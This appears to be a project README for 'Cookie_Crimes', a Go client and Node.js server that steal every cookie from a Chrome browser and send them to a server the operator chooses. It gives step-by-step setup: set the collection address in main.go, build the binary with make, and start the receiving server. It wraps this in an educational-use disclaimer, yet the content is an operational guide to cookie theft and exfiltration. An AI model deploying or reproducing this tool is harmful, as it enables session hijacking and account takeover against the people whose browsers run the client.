Cookie_Crimes is a tool designed to extract cookies from a client's Chrome browser.
With just a single click, all cookies stored in the browser will be captured and immediately sent to a specified server.
β οΈ Disclaimer
This project is strictly intended for educational and research purposes only.
The authors and contributors are not responsible for any misuse, damage, or legal consequences resulting from the use of this software.
Use this tool ethically and with respect for others' privacy.
- Navigate to the
clientfolder. - Open the
main.gofile (Go is used due to its simplicity and easy compilation). - Replace:
with your server's IP address or domain.
http://localhost:8080
- Save and close the file.
- Run the following command to build the executable:
This will compile
make build
main.gointo an executable binary using the providedMakefile.
- Navigate to the
serverdirectory. - Install required dependencies:
npm install
- Start the server:
node index.js
Once both the client and server are running, any execution of the client binary will send browser cookies to your specified server.
π‘ Use responsibly and only in controlled, ethical environments.